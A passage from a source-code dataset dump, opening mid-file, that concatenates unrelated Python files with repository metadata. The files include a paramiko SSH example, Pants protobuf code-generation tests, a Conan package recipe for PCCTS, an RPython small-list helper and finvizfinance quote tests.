load_code = bytecode.GlobalLoadU8
def store_initial_value(self, list):
if self.init is not None:
for (i, v) in enumerate(self.init):
list[self.pos + i] = v % 256
class ArrayView16(ArrayView):
bytes_per_item = 2
store_code = bytecode.GlobalStore16
load_code = bytecode.GlobalLoad16
def store_initial_value(self, list):
if self.init is not None:
for (i, v) in enumerate(self.init):
a, b = divmod(v, 0x100)
a = a % 0x100
list[self.pos + 2*i:self.pos + 2*i + 2] = a, b
accessor_types = {
'int8s': SingleView8s,
'int8u': SingleView8u,
'int16': SingleView16,
'array8s': ArrayView8s,
'array8u': ArrayView8u,
'array16': ArrayView16,
}
| 42.02681 | 174 | 0.587459 |
f1f2c7e9ef1a554f5e2227a10d8232e4894e6d98 | 645 | py | Python | ch02/command.py | PacktPublishing/Python-Networking-Cookbook | 26945c781a51fe72cc01409df6b5c5fa7df53f4c | [
"MIT"
] | 5 | 2021-06-11T11:24:04.000Z | 2022-03-22T03:22:57.000Z | ch02/command.py | PacktPublishing/Python-Networking-Cookbook | 26945c781a51fe72cc01409df6b5c5fa7df53f4c | [
"MIT"
] | null | null | null | ch02/command.py | PacktPublishing/Python-Networking-Cookbook | 26945c781a51fe72cc01409df6b5c5fa7df53f4c | [
"MIT"
] | 10 | 2021-04-18T12:31:14.000Z | 2022-03-28T07:21:16.000Z | import time
from paramiko.client import SSHClient
# Credentials here are for a always-on Sandbox from Cisco DevNet
SSH_USER = "<Insert user>"
SSH_PASSWORD = "<insert password>"
SSH_HOST = "<insert host>"
SSH_PORT = 22 # Change this if your SSH port is different
client = SSHClient()
client.load_system_host_keys()
client.connect(SSH_HOST, port=SSH_PORT,
username=SSH_USER,
password=SSH_PASSWORD,
look_for_keys=False)
CMD = "show ip interface brief" # You can issue any command you want
stdin, stdout, stderr = client.exec_command(CMD)
time.sleep(5)
client.close()
| 26.875 | 68 | 0.682171 |
ff4c17f0d7da699cd84ade4dbaebf62030f8ea3a | 12,740 | py | Python | tests/python/pants_test/backend/codegen/tasks/test_protobuf_gen.py | qma/pants | 604f58a366b66bc5cfa83e7250cb8af8130832cf | [
"Apache-2.0"
] | null | null | null | tests/python/pants_test/backend/codegen/tasks/test_protobuf_gen.py | qma/pants | 604f58a366b66bc5cfa83e7250cb8af8130832cf | [
"Apache-2.0"
] | null | null | null | tests/python/pants_test/backend/codegen/tasks/test_protobuf_gen.py | qma/pants | 604f58a366b66bc5cfa83e7250cb8af8130832cf | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
import re
from collections import OrderedDict
from textwrap import dedent
from twitter.common.collections import OrderedSet
from pants.backend.codegen.register import build_file_aliases as register_codegen
from pants.backend.codegen.tasks.protobuf_gen import (ProtobufGen, _same_contents,
check_duplicate_conflicting_protos)
from pants.backend.core.register import build_file_aliases as register_core
from pants.base.validation import assert_list
from pants.util.contextutil import temporary_file
from pants.util.dirutil import safe_mkdir
from pants_test.tasks.task_test_base import TaskTestBase
class ProtobufGenTest(TaskTestBase):
def setUp(self):
super(ProtobufGenTest, self).setUp()
self.set_options(pants_bootstrapdir='~/.cache/pants',
max_subprocess_args=100,
pants_support_fetch_timeout_secs=1,
pants_support_baseurls=['http://example.com/dummy_base_url'])
@classmethod
def task_type(cls):
return ProtobufGen
@property
def alias_groups(self):
return register_core().merge(register_codegen())
def assert_files(self, task, rel_path, contents, expected_files):
assert_list(expected_files)
with temporary_file() as fp:
fp.write(contents)
fp.close()
self.assertEqual(set(expected_files), set(task.calculate_genfiles(fp.name, rel_path)))
def assert_java_files(self, task, rel_path, contents, expected_files):
self.assert_files(task, rel_path, contents, expected_files)
def test_plain(self):
task = self.create_task(self.context())
self.assert_java_files(
task,
'snake_case.proto',
'package com.twitter.ads.revenue_tables;',
['com/twitter/ads/revenue_tables/SnakeCase.java'])
self.assert_java_files(
task,
'a/b/jake.proto',
'package com.twitter.ads.revenue_tables;',
['com/twitter/ads/revenue_tables/Jake.java'])
def test_custom_package(self):
task = self.create_task(self.context())
self.assert_java_files(
task,
'fred.proto',
"""
package com.twitter.ads.revenue_tables;
option java_package = "com.example.foo.bar";
""",
['com/example/foo/bar/Fred.java'])
self.assert_java_files(
task,
'bam_bam.proto',
'option java_package = "com.example.baz.bip";',
['com/example/baz/bip/BamBam.java'])
self.assert_java_files(
task,
'bam_bam.proto',
'option java_package="com.example.baz.bip" ;',
['com/example/baz/bip/BamBam.java'])
self.assert_java_files(
task,
'fred.proto',
"""
option java_package = "com.example.foo.bar";
package com.twitter.ads.revenue_tables;
""",
['com/example/foo/bar/Fred.java'])
def test_custom_outer(self):
task = self.create_task(self.context())
self.assert_java_files(
task,
'jack_spratt.proto',
"""
package com.twitter.lean;
option java_outer_classname = "To";
""",
['com/twitter/lean/To.java'])
def test_multiple_files(self):
task = self.create_task(self.context())
self.assert_java_files(
task,
'jack_spratt.proto',
"""
package com.twitter.lean;
option java_multiple_files = false;
""",
['com/twitter/lean/JackSpratt.java'])
self.assert_java_files(
task,
'jack_spratt_no_whitespace.proto',
"""
package com.twitter.lean;
option java_multiple_files = true;
enum Jake { FOO=1;}
message joe_bob {}
""",
['com/twitter/lean/Jake.java',
'com/twitter/lean/joe_bob.java',
'com/twitter/lean/joe_bobOrBuilder.java',
'com/twitter/lean/JackSprattNoWhitespace.java'])
self.assert_java_files(
task,
'inner_class.proto',
"""
package org.pantsbuild.protos;
option java_multiple_files = true;
message Foo {
enum Bar {
BAZ = 0;
}
}
""",
['org/pantsbuild/protos/InnerClass.java',
'org/pantsbuild/protos/Foo.java',
'org/pantsbuild/protos/FooOrBuilder.java'])
self.assert_java_files(
task,
'Camel-case.proto',
"""
package pants.preferences;
option java_package = "org.pantsbuild.protos.preferences";
""",
['org/pantsbuild/protos/preferences/CamelCase.java'])
self.assert_java_files(
task,
'curly_braces.proto',
"""
package pants.preferences;
option java_package = "org.pantsbuild.protos.preferences";
option java_multiple_files = true;
message Wat { message Inner { option meh = true; }
option Inner field = 1;
}
service SomeService { rpc AndAnother() {} }
""",
['org/pantsbuild/protos/preferences/CurlyBraces.java',
'org/pantsbuild/protos/preferences/SomeService.java',
'org/pantsbuild/protos/preferences/Wat.java',
'org/pantsbuild/protos/preferences/WatOrBuilder.java'])
self.assert_java_files(
task,
'pants.proto',
"""
package pants.preferences;
option java_multiple_files = true;
option java_package = "org.pantsbuild.protos.preferences";
message AnotherMessage {
BAZ = 0;
}
service SomeService {
rpc SomeRpc();
rpc AnotherRpc() {
}
rpc AndAnother() {}
}
message MessageAfterService {
MEH = 0;
}
""",
['org/pantsbuild/protos/preferences/Pants.java',
'org/pantsbuild/protos/preferences/AnotherMessage.java',
'org/pantsbuild/protos/preferences/AnotherMessageOrBuilder.java',
'org/pantsbuild/protos/preferences/SomeService.java',
'org/pantsbuild/protos/preferences/MessageAfterService.java',
'org/pantsbuild/protos/preferences/MessageAfterServiceOrBuilder.java'])
def test_same_contents(self):
dup1 = self.create_file('src/dup1.proto', dedent("""
package com.twitter.lean;
option java_multiple_files = true;
enum Jake { FOO=1;}
message joe_bob {}
"""))
dup2 = self.create_file('src/dup2.proto', dedent("""
package com.twitter.lean;
option java_multiple_files = true;
enum Jake { FOO=1;}
message joe_bob {}
"""))
self.assertTrue(_same_contents(dup1, dup2))
def test_not_same_contents(self):
dup1 = self.create_file('src/dup1.proto', dedent("""
package com.twitter.lean;
option java_multiple_files = true;
enum Jake { FOO=1;}
message joe_bob {}
"""))
dup2 = self.create_file('src/dup2.proto', dedent("""
package com.twitter.lean;
message joe_bob {}
"""))
self.assertFalse(_same_contents(dup1, dup2))
def test_protos_extracted_under_build_root(self):
"""This testcase shows that you can put sources for protos outside the directory where the
BUILD file is defined. This will be the case for .proto files that have been extracted
under .pants.d.
"""
# place a .proto file in a place outside of where the BUILD file is defined
extracted_source_path = os.path.join(self.build_root, 'extracted', 'src', 'proto')
safe_mkdir(os.path.join(extracted_source_path, 'sample-package'))
sample_proto_path = os.path.join(extracted_source_path, 'sample-package', 'sample.proto')
with open(sample_proto_path, 'w') as sample_proto:
sample_proto.write(dedent("""
package com.example;
message sample {}
"""))
self.add_to_build_file('sample', dedent("""
java_protobuf_library(name='sample',
sources=['{sample_proto_path}'],
)""").format(sample_proto_path=sample_proto_path))
target = self.target("sample:sample")
context = self.context(target_roots=[target])
task = self.create_task(context=context)
sources_by_base = task._calculate_sources([target])
self.assertEquals(['extracted/src/proto'], sources_by_base.keys())
self.assertEquals(OrderedSet([sample_proto_path]), sources_by_base['extracted/src/proto'])
def test_default_javadeps(self):
self.create_file(relpath='test_proto/test.proto', contents=dedent("""
package com.example.test_proto;
enum Foo { foo=1;}
message Bar {}
"""))
self.add_to_build_file('test_proto', dedent("""
java_protobuf_library(name='proto',
sources=['test.proto'],
dependencies=[]
)
"""))
self.add_to_build_file('3rdparty', dedent("""
target(name='protobuf-java')
"""))
context = self.context(target_roots=[self.target('test_proto:proto')])
task = self.create_task(context)
javadeps = task.javadeps
self.assertEquals(len(javadeps), 1)
self.assertEquals('protobuf-java', javadeps.pop().name)
def test_calculate_sources(self):
self.add_to_build_file('proto-lib', dedent("""
java_protobuf_library(name='proto-target',
sources=['foo.proto'],
)
"""))
target = self.target('proto-lib:proto-target')
context = self.context(target_roots=[target])
task = self.create_task(context)
result = task._calculate_sources([target])
self.assertEquals(1, len(result.keys()))
self.assertEquals(OrderedSet(['proto-lib/foo.proto']), result['proto-lib'])
def test_calculate_sources_with_source_root(self):
self.add_to_build_file('project/src/main/proto/proto-lib', dedent("""
java_protobuf_library(name='proto-target',
sources=['foo.proto'],
)
"""))
target = self.target('project/src/main/proto/proto-lib:proto-target')
context = self.context(target_roots=[target])
task = self.create_task(context)
result = task._calculate_sources([target])
self.assertEquals(1, len(result.keys()))
self.assertEquals(OrderedSet(['project/src/main/proto/proto-lib/foo.proto']), result['project/src/main/proto'])
class MockLogger(object):
def __init__(self):
self._warn = []
self._error = []
def warn(self, msg):
self._warn.append(msg)
def error(self, msg):
self._error.append(msg)
def test_check_duplicate_conflicting_protos_warn(self):
file1 = self.create_file('src1/foo.proto', dedent("""
package com.example.test_proto;
message Foo{}
"""))
# Create an identical .proto file in a different directory
file2 = self.create_file('src2/foo.proto', dedent("""
package com.example.test_proto;
message Foo{}
"""))
task = self.create_task(self.context())
test_logger = self.MockLogger()
sources_by_base = OrderedDict()
sources_by_base[os.path.join(self.build_root, 'src1')] = [file1]
sources_by_base[os.path.join(self.build_root, 'src2')] = [file2]
check_duplicate_conflicting_protos(task, sources_by_base, [file1, file2], test_logger)
self.assertEquals(2, len(test_logger._warn), '\n'.join([re.sub('\\n', '\\\\n', s) for s in test_logger._warn]))
self.assertRegexpMatches(test_logger._warn[0], '^Proto duplication detected.*\n.*src1/foo.proto\n.*src2/foo.proto')
self.assertRegexpMatches(test_logger._warn[1], 'Arbitrarily favoring proto 1')
self.assertEquals([], test_logger._error)
def test_check_duplicate_conflicting_protos_error(self):
file1 = self.create_file('src1/foo.proto', dedent("""
package com.example.test_proto;
message Foo{value=1;}
"""))
# Create an .proto file in a different directory that has a different definition
file2 = self.create_file('src2/foo.proto', dedent("""
package com.example.test_proto;
message Foo{}
"""))
task = self.create_task(self.context())
test_logger = self.MockLogger()
sources_by_base = OrderedDict()
sources_by_base[os.path.join(self.build_root, 'src1')] = [file1]
sources_by_base[os.path.join(self.build_root, 'src2')] = [file2]
check_duplicate_conflicting_protos(task, sources_by_base, [file1, file2], test_logger)
self.assertEquals(1, len(test_logger._warn))
self.assertRegexpMatches(test_logger._warn[0], 'Arbitrarily favoring proto 1')
self.assertEquals(1, len(test_logger._error))
self.assertRegexpMatches(test_logger._error[0], '^Proto conflict detected.*\n.*src1/foo.proto\n.*src2/foo.proto')
| 34.432432 | 119 | 0.656122 |
7922abf0fad9d4030ee7bd40e11c9d852a611b37 | 1,993 | py | Python | conanfile.py | db4/conan-pccts | a42f94db9c2389d51c3d180f91c2ef82f4ab2b28 | [
"MIT"
] | null | null | null | conanfile.py | db4/conan-pccts | a42f94db9c2389d51c3d180f91c2ef82f4ab2b28 | [
"MIT"
] | null | null | null | conanfile.py | db4/conan-pccts | a42f94db9c2389d51c3d180f91c2ef82f4ab2b28 | [
"MIT"
] | null | null | null | import os, shutil
from conans import ConanFile, tools
class PcctsConan(ConanFile):
name = "pccts"
version = "1.33MR33"
settings = "os_build", "compiler", "arch_build"
generators = "gcc"
description = "PCCTS toolkit"
license = "public domain"
url = "https://github.com/db4/conan-pccts"
def build(self):
if self.settings.os_build == "Windows":
tools.get("http://www.polhode.com/win32.zip", sha1="db910f4397b2f77a58980e9ab3ba2603c42ba50e")
else:
tools.get("http://www.polhode.com/pccts133mr.zip", sha1="5b3417efd5f537434b568114bcda853b4975d851")
if tools.cross_building(self.settings):
shutil.copytree("pccts", "pccts-host")
self.run("cd pccts-host && make COPT=-DPCCTS_USE_STDARG")
tools.replace_in_file("pccts/sorcerer/makefile", "$(BIN)/antlr", "../../pccts-host/bin/antlr")
tools.replace_in_file("pccts/sorcerer/makefile", "$(BIN)/dlg", "../../pccts-host/bin/dlg")
tools.replace_in_file("pccts/support/genmk/makefile", "$(CC) -o", "$(CC) $(COPT) -o")
self.run("cd pccts && make CC=\"gcc @{0}\" COPT=-DPCCTS_USE_STDARG".format(
os.path.join(self.build_folder, "conanbuildinfo.gcc")))
def package(self):
tmp = tools.load("pccts/h/antlr.h")
license_contents = tmp[tmp.find(" * SOFTWARE RIGHTS"):tmp.find("*/")]
tools.save("LICENSE", license_contents)
self.copy("LICENSE")
self.copy("*.h", dst="include", src="pccts/h")
self.copy("*.cpp", dst="include", src="pccts/h")
self.copy("*", dst="bin", src="pccts/bin", excludes="*.txt")
def package_info(self):
self.env_info.path.append(os.path.join(self.package_folder, "bin"))
def package_id(self):
self.info.include_build_settings()
if self.info.settings.os_build == "Windows":
del self.info.settings.arch_build
del self.info.settings.compiler
| 44.288889 | 111 | 0.616658 |
9f2218ed95c32990f1e40540f92062fcd256fb81 | 673 | py | Python | doc/conf.py | otamachan2/sphinxcontrib-ros | 6155cb645e9700add0602d0812275a8a22aad962 | [
"BSD-2-Clause"
] | null | null | null | doc/conf.py | otamachan2/sphinxcontrib-ros | 6155cb645e9700add0602d0812275a8a22aad962 | [
"BSD-2-Clause"
] | null | null | null | doc/conf.py | otamachan2/sphinxcontrib-ros | 6155cb645e9700add0602d0812275a8a22aad962 | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import sys
import sphinx_rtd_theme
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', 'src'))
import sphinxcontrib; reload(sphinxcontrib)
extensions = ['sphinxcontrib.ros']
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'sphinxcontritb-ros'
copyright = u'2015, otamachan'
version = '0.1.0'
release = '0.1.0'
exclude_patterns = ['_build']
pygments_style = 'sphinx'
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
def setup(app):
app.add_description_unit('confval', 'confval',
'pair: %s; configuration value')
| 29.26087 | 72 | 0.702823 |
d0768d0ca0c17922d391894b0a409b453b80a7f3 | 10,153 | py | Python | pycket/small_list.py | krono/pycket | 5eff3401ce5cf34b16863b669ac9e274edabbe00 | [
"MIT"
] | null | null | null | pycket/small_list.py | krono/pycket | 5eff3401ce5cf34b16863b669ac9e274edabbe00 | [
"MIT"
] | null | null | null | pycket/small_list.py | krono/pycket | 5eff3401ce5cf34b16863b669ac9e274edabbe00 | [
"MIT"
] | null | null | null | from pycket import config
from rpython.rlib import jit, debug, objectmodel
def inline_small_list(sizemax=11, sizemin=0, immutable=False, attrname="list", factoryname="make", unbox_num=False):
"""
This function is helpful if you have a class with a field storing a
list and the list is often very small. Calling this function will inline
the list into instances for the small sizes. This works by adding the
following methods to the class:
_get_list(self, i): return ith element of the list
_set_list(self, i, val): set ith element of the list
_get_full_list(self): returns a copy of the full list
@staticmethod
make(listcontent, *args): makes a new instance with the list's content set to listcontent
"""
if not config.type_size_specialization:
sizemin = sizemax = 0
unbox_num = False
def wrapper(cls):
from rpython.rlib.unroll import unrolling_iterable
classes = []
def make_methods(size):
attrs = ["_%s_%s" % (attrname, i) for i in range(size)]
unrolling_enumerate_attrs = unrolling_iterable(enumerate(attrs))
def _get_size_list(self):
return size
def _get_list(self, i):
for j, attr in unrolling_enumerate_attrs:
if j == i:
return getattr(self, attr)
raise IndexError
def _get_full_list(self):
res = [None] * size
for i, attr in unrolling_enumerate_attrs:
res[i] = getattr(self, attr)
return res
def _set_list(self, i, val):
for j, attr in unrolling_enumerate_attrs:
if j == i:
setattr(self, attr, val)
return
raise IndexError
def _init(self, elems, *args):
assert len(elems) == size
for i, attr in unrolling_enumerate_attrs:
setattr(self, attr, elems[i])
cls.__init__(self, *args)
meths = {"_get_list": _get_list, "_get_size_list": _get_size_list, "_get_full_list": _get_full_list, "_set_list": _set_list, "__init__" : _init}
if immutable:
meths["_immutable_fields_"] = attrs
return meths
classes = [type(cls)("%sSize%s" % (cls.__name__, size), (cls, ), make_methods(size)) for size in range(sizemin, sizemax)]
def _get_arbitrary(self, i):
return getattr(self, attrname)[i]
def _get_size_list_arbitrary(self):
return len(getattr(self, attrname))
def _get_list_arbitrary(self):
return getattr(self, attrname)
def _set_arbitrary(self, i, val):
getattr(self, attrname)[i] = val
def _init(self, elems, *args):
debug.make_sure_not_resized(elems)
setattr(self, attrname, elems)
cls.__init__(self, *args)
meths = {"_get_list": _get_arbitrary, "_get_size_list": _get_size_list_arbitrary, "_get_full_list": _get_list_arbitrary, "_set_list": _set_arbitrary, "__init__": _init}
if immutable:
meths["_immutable_fields_"] = ["%s[*]" % (attrname, )]
cls_arbitrary = type(cls)("%sArbitrary" % cls.__name__, (cls, ), meths)
def make(elems, *args):
if classes:
if (elems is None or len(elems) == 0):
return make0(*args)
else:
if elems is None:
elems = []
if sizemin <= len(elems) < sizemax:
cls = classes[len(elems) - sizemin]
else:
cls = cls_arbitrary
return cls(elems, *args)
# XXX those could be done more nicely
def make0(*args):
if not classes: # no type specialization
return make([], *args)
result = objectmodel.instantiate(classes[0])
cls.__init__(result, *args)
return result
def make1(elem, *args):
if not classes: # no type specialization
return make([elem], *args)
result = objectmodel.instantiate(classes[1])
result._set_list(0, elem)
cls.__init__(result, *args)
return result
def make2(elem1, elem2, *args):
if not classes: # no type specialization
return make([elem1, elem2], *args)
result = objectmodel.instantiate(classes[2])
result._set_list(0, elem1)
result._set_list(1, elem2)
cls.__init__(result, *args)
return result
def make_n(size, *args):
if sizemin <= size < sizemax:
subcls = classes[size - sizemin]
else:
subcls = cls_arbitrary
result = objectmodel.instantiate(subcls)
if subcls is cls_arbitrary:
assert isinstance(result, subcls)
setattr(result, attrname, [None] * size)
cls.__init__(result, *args)
return result
if unbox_num:
make, make1, make2 = _add_num_classes(cls, make, make0, make1, make2)
setattr(cls, factoryname, staticmethod(make))
setattr(cls, factoryname + "0", staticmethod(make0))
setattr(cls, factoryname + "1", staticmethod(make1))
setattr(cls, factoryname + "2", staticmethod(make2))
setattr(cls, factoryname + "_n", staticmethod(make_n))
return cls
return wrapper
def _add_num_classes(cls, orig_make, orig_make0, orig_make1, orig_make2):
# XXX quite brute force
def make(vals, *args):
from pycket.values import W_Fixnum
if vals is None or len(vals) == 0:
return orig_make0(*args)
if len(vals) == 1:
return make1(vals[0], *args)
if len(vals) == 2:
return make2(vals[0], vals[1], *args)
return orig_make(vals, *args)
def make1(w_a, *args):
from pycket.values import W_Fixnum, W_Flonum
if isinstance(w_a, W_Fixnum):
return Size1Fixed(w_a.value, *args)
if isinstance(w_a, W_Flonum):
return Size1Flo(w_a.value, *args)
return orig_make1(w_a, *args)
def make2(w_a, w_b, *args):
from pycket.values import W_Fixnum
if isinstance(w_a, W_Fixnum):
if isinstance(w_b, W_Fixnum):
return Size2Fixed11(w_a.value, w_b.value, *args)
else:
return Size2Fixed10(w_a.value, w_b, *args)
elif isinstance(w_b, W_Fixnum):
return Size2Fixed01(w_a, w_b.value, *args)
return orig_make2(w_a, w_b, *args)
class Size1Fixed(cls):
def __init__(self, vals_fixed_0, *args):
self.vals_fixed_0 = vals_fixed_0
cls.__init__(self, *args)
def _get_size_list(self):
return 1
def _get_full_list(self):
return [self._get_list(0)]
def _get_list(self, i):
from pycket.values import W_Fixnum
assert i == 0
return W_Fixnum(self.vals_fixed_0)
def _set_list(self, i, val):
raise NotImplementedError()
Size1Fixed.__name__ = cls.__name__ + Size1Fixed.__name__
class Size1Flo(cls):
def __init__(self, vals_flo_0, *args):
self.vals_flo_0 = vals_flo_0
cls.__init__(self, *args)
def _get_size_list(self):
return 1
def _get_full_list(self):
return [self._get_list(0)]
def _get_list(self, i):
from pycket.values import W_Flonum
assert i == 0
return W_Flonum(self.vals_flo_0)
def _set_list(self, i, val):
raise NotImplementedError()
Size1Flo.__name__ = cls.__name__ + Size1Flo.__name__
class Size2Fixed10(cls):
def __init__(self, vals_fixed_0, w_val1, *args):
self.vals_fixed_0 = vals_fixed_0
self.w_val1 = w_val1
cls.__init__(self, *args)
def _get_size_list(self):
return 2
def _get_full_list(self):
return [self._get_list(0), self._get_list(1)]
def _get_list(self, i):
from pycket.values import W_Fixnum
if i == 0:
return W_Fixnum(self.vals_fixed_0)
else:
assert i == 1
return self.w_val1
def _set_list(self, i, val):
raise NotImplementedError()
Size2Fixed10.__name__ = cls.__name__ + Size2Fixed10.__name__
class Size2Fixed01(cls):
def __init__(self, w_val0, vals_fixed_1, *args):
self.w_val0 = w_val0
self.vals_fixed_1 = vals_fixed_1
cls.__init__(self, *args)
def _get_size_list(self):
return 2
def _get_full_list(self):
return [self._get_list(0), self._get_list(1)]
def _get_list(self, i):
from pycket.values import W_Fixnum
if i == 0:
return self.w_val0
else:
assert i == 1
return W_Fixnum(self.vals_fixed_1)
def _set_list(self, i, val):
raise NotImplementedError()
Size2Fixed01.__name__ = cls.__name__ + Size2Fixed01.__name__
class Size2Fixed11(cls):
def __init__(self, vals_fixed_0, vals_fixed_1, *args):
self.vals_fixed_0 = vals_fixed_0
self.vals_fixed_1 = vals_fixed_1
cls.__init__(self, *args)
def _get_size_list(self):
return 2
def _get_full_list(self):
return [self._get_list(0), self._get_list(1)]
def _get_list(self, i):
from pycket.values import W_Fixnum
if i == 0:
return W_Fixnum(self.vals_fixed_0)
else:
assert i == 1
return W_Fixnum(self.vals_fixed_1)
def _set_list(self, i, val):
raise NotImplementedError()
Size2Fixed11.__name__ = cls.__name__ + Size2Fixed11.__name__
return make, make1, make2
| 36.786232 | 176 | 0.571161 |
a48eb9f199eadbd142322d72558b67621c83bfb1 | 815 | py | Python | Autocoders/src/generators/visitors/TestImplVisitorBase.py | lydiaxing/fprime | f6b3e03f89e9aca1614243c9896d4a72aa0cc726 | [
"Apache-2.0"
] | 2 | 2020-09-08T05:39:05.000Z | 2021-05-04T14:58:51.000Z | Autocoders/src/generators/visitors/TestImplVisitorBase.py | JPLOpenSource/fprime-sw-Rel1.0 | 18364596c24fa369c938ef8758e5aa945ecc6a9b | [
"Apache-2.0"
] | 2 | 2019-02-27T03:17:15.000Z | 2019-03-01T22:34:30.000Z | Autocoders/src/generators/visitors/TestImplVisitorBase.py | JPLOpenSource/fprime-sw-Rel1.0 | 18364596c24fa369c938ef8758e5aa945ecc6a9b | [
"Apache-2.0"
] | 3 | 2019-02-17T20:41:15.000Z | 2019-02-26T21:06:50.000Z | #!/bin/env python
#===============================================================================
# NAME: TestImplVisitorBase.py
#
# DESCRIPTION: A base class for TestImpl visitors
#
# AUTHOR: bocchino
# EMAIL: bocchino@jpl.nasa.gov
# DATE CREATED: November 14, 2015
#
# Copyright 2015, California Institute of Technology.
# ALL RIGHTS RESERVED. U.S. Government Sponsorship acknowledged.
#===============================================================================
from generators.visitors import ComponentVisitorBase
class TestImplVisitorBase(ComponentVisitorBase.ComponentVisitorBase):
"""
A base class for TestImpl visitors
"""
def initTestImpl(self, obj, c):
self.init(obj, c)
c.component_base = c.name() + "ComponentBase"
c.gtest_base = c.name() + "GTestBase"
| 30.185185 | 80 | 0.57546 |
bbda033865b84a73a0af11697d73ea7efe95b4be | 1,234 | py | Python | generatePages/updateFooter.py | Sonalisinghal/techhelpher | 226743685d0e72a763db33f312eae2b7a8454d92 | [
"CC-BY-3.0"
] | 1 | 2020-05-30T14:24:22.000Z | 2020-05-30T14:24:22.000Z | generatePages/updateFooter.py | Sonalisinghal/techhelpher | 226743685d0e72a763db33f312eae2b7a8454d92 | [
"CC-BY-3.0"
] | 1 | 2021-03-15T06:18:03.000Z | 2021-03-15T06:18:03.000Z | generatePages/updateFooter.py | Sonalisinghal/techhelpher | 226743685d0e72a763db33f312eae2b7a8454d92 | [
"CC-BY-3.0"
] | null | null | null | import os
from pages import pagelist
startComment = "START AUTO-INSERT FOOTER"
endComment = "END AUTO-INSERT FOOTER"
tempfile = 'nav.temp'
def updatePage():
with open(pageToChange,'r') as file:
orgLines = file.readlines()
with open(pageToChange,'w') as file:
write = True
for x in orgLines:
if endComment in x:
write = True
file.write('\n')
if write:
file.write(x)
if startComment in x:
with open(tempfile,'r') as temp:
add = temp.read()
file.write(add)
write = False
with open(tempfile, 'w') as f:
f.write('''
<footer id="footer">
<div class="inner">
<section>
<h2>Get in touch</h2>
<ul class="icons">
<li><a target="_blank" href="https://github.com/Sonalisinghal" class="icon brands style2 fa-github"><span class="label">GitHub</span></a></li>
</ul>
</section>
<ul class="copyright">
<li>Made by Sonali Singhal</li><li>Design: <a href="http://html5up.net">HTML5 UP - Phantom</a></li>
</ul>
</div>
</footer>''')
for pageToChange in pagelist:
updatePage()
#remove <tempfile> as we don't need it anymore
os.remove(tempfile)
| 26.255319 | 151 | 0.583468 |
de977a5433adac539e6b00b4ffb185c559d896ce | 549 | py | Python | PBLCoders/convert.py | Tyler929/tyler929.github.io-Tyler929 | f5f0451c55bc12a668b7ad880995c96bd4c0d5ed | [
"MIT"
] | null | null | null | PBLCoders/convert.py | Tyler929/tyler929.github.io-Tyler929 | f5f0451c55bc12a668b7ad880995c96bd4c0d5ed | [
"MIT"
] | null | null | null | PBLCoders/convert.py | Tyler929/tyler929.github.io-Tyler929 | f5f0451c55bc12a668b7ad880995c96bd4c0d5ed | [
"MIT"
] | null | null | null | # asks for name and gender
def storyStart(name, gender):
pronoun = ''
if gender == 'm':
pronoun = 'He'
pronoun1 = "his"
elif gender == 'f':
pronoun = 'She'
# prints variable arguments
print('One stormy day, ' + name + ' was attempting to mine bitcoin.')
print(pronoun + ' was desperate to mine, but couldn\'t, the malware overtook ' + pronoun1 + ' computer!' )
userName = input('What is your name? ')
gender = input('Are you male or female (type m or f)? ')
# program
storyStart(userName, gender)
| 23.869565 | 110 | 0.617486 |
4fd52550bf8badb9bf85b5194aaacd10adf033a9 | 145 | py | Python | test/regression/features/comprehensions/singleton_comprehension.py | ppelleti/berp | 30925288376a6464695341445688be64ac6b2600 | [
"BSD-3-Clause"
] | 137 | 2015-02-13T21:03:23.000Z | 2021-11-24T03:53:55.000Z | test/regression/features/comprehensions/singleton_comprehension.py | ppelleti/berp | 30925288376a6464695341445688be64ac6b2600 | [
"BSD-3-Clause"
] | 4 | 2015-04-01T13:49:13.000Z | 2019-07-09T19:28:56.000Z | test/regression/features/comprehensions/singleton_comprehension.py | bjpop/berp | 30925288376a6464695341445688be64ac6b2600 | [
"BSD-3-Clause"
] | 8 | 2015-04-25T03:47:52.000Z | 2019-07-27T06:33:56.000Z | # list
print([x for x in [1]])
# set
print({x for x in [1]})
# dict
print({x:x for x in [1]})
# gen
for item in (x for x in [1]):
print(item)
| 14.5 | 29 | 0.551724 |
d284e21bdfc81e1268e3608634db92854d9cdc1c | 1,553 | py | Python | test/test_quote.py | major/finvizfinance | f5998ce78f79baa8a63a78e831e950d48cc830c9 | [
"MIT"
] | 1 | 2022-02-12T05:56:29.000Z | 2022-02-12T05:56:29.000Z | test/test_quote.py | major/finvizfinance | f5998ce78f79baa8a63a78e831e950d48cc830c9 | [
"MIT"
] | null | null | null | test/test_quote.py | major/finvizfinance | f5998ce78f79baa8a63a78e831e950d48cc830c9 | [
"MIT"
] | null | null | null | import pytest
from finvizfinance.quote import finvizfinance, Quote, Statements
# def test_finvizfinance_quote(mocker):
# web_scrap_mock = mocker.patch('finvizfinance.quote.web_scrap', return_value={"text": 'web_scrap'})
# Quote().getCurrent('ticker')
# web_scrap_mock.assert_called_with('https://finviz.com/request_quote.ashx?t=ticker')
def test_finvizfinance_finvizfinance():
stock = finvizfinance('tsla')
stock_info = stock.ticker_full_info()
assert(stock_info is not None)
def test_finvizfinance_finvizfinance_chart_invalid(mocker):
mocker.patch('finvizfinance.quote.finvizfinance._checkexist', return_value=True)
mocker.patch('finvizfinance.quote.web_scrap', return_value="")
with pytest.raises(ValueError, match=r"Invalid timeframe 'dummy'"):
finvizfinance('tsla').ticker_charts(timeframe='dummy')
def test_statements():
fstatments = Statements()
df = fstatments.get_statements('tsla')
assert (df is not None)
with pytest.raises(ValueError, match=r"Invalid chart type 'dummy'"):
finvizfinance('tsla').ticker_charts(charttype='dummy')
def test_finvizfinance_finvizfinance_chart(mocker):
mocker.patch('finvizfinance.quote.finvizfinance._checkexist', return_value=True)
mocker.patch('finvizfinance.quote.web_scrap', return_value="")
image_scrap_mock = mocker.patch('finvizfinance.quote.image_scrap')
finvizfinance('dummy').ticker_charts()
image_scrap_mock.assert_called_with(
'https://finviz.com/chart.ashx?t=dummy&ty=c&ta=1&p=d', 'dummy', '')
| 38.825 | 104 | 0.749517 |
